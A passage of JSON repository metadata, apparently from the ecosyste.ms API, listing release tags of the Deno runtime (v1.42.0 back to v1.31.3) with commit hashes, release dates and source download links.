v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sh